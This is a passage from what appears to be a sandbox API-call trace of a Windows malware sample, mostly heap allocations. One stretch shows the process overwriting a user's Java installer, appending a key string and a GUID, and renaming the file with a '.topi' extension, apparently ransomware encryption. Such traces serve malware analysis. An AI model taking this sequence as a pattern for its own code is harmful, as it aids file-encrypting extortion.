0x31ef928 [0098.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0098.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0098.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0098.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0098.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0098.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0098.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5198 | out: hHeap=0x680000) returned 1 [0098.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0098.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5180 | out: hHeap=0x680000) returned 1 [0098.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0098.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0098.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0098.938] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0098.938] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0098.938] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0098.938] GetCurrentThreadId () returned 0x8c4 [0098.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0098.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99fad60 [0098.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0098.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0098.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0098.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0098.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0098.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0098.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0098.938] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0098.938] GetCurrentThreadId () returned 0x8c4 [0098.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0098.938] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0098.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0098.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0098.938] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0098.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0098.938] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0098.938] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0098.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0098.938] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0098.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0098.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0098.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0098.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0098.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0098.938] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0098.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0098.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0098.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0098.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0098.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0098.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0098.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0098.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5180 [0098.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0098.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0098.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0098.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0098.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0098.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0098.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0098.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5198 [0098.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0098.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0098.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0098.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5168 [0098.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0098.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0098.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0098.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0098.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0098.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0098.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0098.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e51b0 [0098.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0098.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e49d0 [0098.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0098.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0098.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0098.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0098.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0098.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0098.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5180 | out: hHeap=0x680000) returned 1 [0098.940] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5180 [0098.940] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0098.940] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0098.940] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0098.940] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0098.940] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0098.940] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0098.940] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0098.940] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0098.940] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0098.940] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191cf0 [0098.940] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5180 | out: hHeap=0x680000) returned 1 [0098.940] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0098.940] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0098.940] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0098.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0098.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0098.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0098.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0098.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0098.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191cf0 | out: hHeap=0x680000) returned 1 [0098.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0098.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0098.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0098.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0098.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e51b0 | out: hHeap=0x680000) returned 1 [0098.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0098.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0098.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0098.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5198 | out: hHeap=0x680000) returned 1 [0098.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5168 | out: hHeap=0x680000) returned 1 [0098.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0098.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0098.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0098.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5150 | out: hHeap=0x680000) returned 1 [0098.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fbf08 | out: hHeap=0x680000) returned 1 [0098.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0098.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0098.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0098.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0098.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0098.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0098.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0098.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0098.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0098.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0098.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0098.941] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x25800, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x25800, lpOverlapped=0x0) returned 1 [0098.942] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0098.942] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xdd600, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.942] WriteFile (in: hFile=0x6a8, lpBuffer=0x99df068*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99df068*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0098.942] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0098.942] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0098.942] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0098.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0098.942] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0098.942] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0098.943] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0098.943] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0098.943] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0098.943] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.943] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0098.943] CloseHandle (hObject=0x6a8) returned 1 [0098.961] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311eb98 [0098.961] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8c0) returned 0x31cf750 [0098.961] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311eb98 | out: hHeap=0x680000) returned 1 [0098.961] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\jre1.7.0_45.msi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\jre1.7.0_45.msi.topi")) returned 1 [0098.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0098.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0098.962] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.963] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x766b58 | out: hHeap=0x680000) returned 1 [0098.963] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68d26e60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68d26e60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xdd600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jre1.7.0_45.msi", cAlternateFileName="JRE170~1.MSI")) returned 0 [0098.963] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0098.963] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0098.963] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4718 | out: hHeap=0x680000) returned 1 [0098.964] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0098.964] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311eb98 [0098.964] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0098.964] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.964] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.964] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.964] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.964] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.964] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.964] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.964] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.964] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.964] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.964] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.964] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.964] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.964] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.964] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.964] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.964] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.964] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.964] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.964] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.964] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.964] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0098.964] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.964] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.964] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.964] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.964] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0098.964] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.964] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0098.964] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.964] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.964] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.965] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.965] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0098.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.965] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.965] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0098.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0098.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.965] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.965] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0098.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0098.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.965] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.965] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.965] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.965] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.965] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.965] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0098.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.965] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.965] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0098.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.965] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.965] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.965] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.965] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.966] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.966] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.966] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.966] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.966] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.966] 